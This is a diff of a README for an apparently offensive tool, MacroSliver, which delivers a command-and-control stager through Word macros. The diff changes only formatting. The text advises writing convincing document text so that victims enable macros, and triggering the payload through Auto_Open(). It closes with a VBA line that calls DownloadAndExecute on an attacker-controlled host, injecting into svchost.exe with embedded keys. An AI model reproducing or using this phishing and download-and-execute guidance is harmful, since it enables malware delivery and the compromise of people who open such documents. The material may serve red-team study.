Cyb3rDudu/MacroSliver/README.md

 This will result in two jobs running on ports `443` and `8080`, both with TLS enabled.

 ### Macro Usage
-The file macrosliver.vba contains the VBA code that is directly usable in Word.
-Create a .docm file with convincing text to prompt the victim to enable macro execution, ensuring that the Run() function is triggered, for example, by calling it in the Auto_Open() trigger or a similar method, to catch the session with the instantiated listener.
+The file `macrosliver.vba` contains the VBA code that is directly usable in Word.
+Create a `.docm` file with convincing text to prompt the victim to enable macro execution, ensuring that the `Run()` function is triggered, for example, by calling it in the `Auto_Open()` trigger or a similar method, to catch the session with the instantiated listener.
 When the VBA function is executed, it deserializes the embedded stager DLL and invokes it.
-After that, the functions of the loader class can be called using the object o.
+After that, the functions of the loader class can be called using the object `o`.
 ```VBA
     Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
     o.DownloadAndExecute "https://192.168.X.X:8080/hello.woff", "svchost.exe", "deflate9", "D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT", "8y/B?E(G+KbPeShV"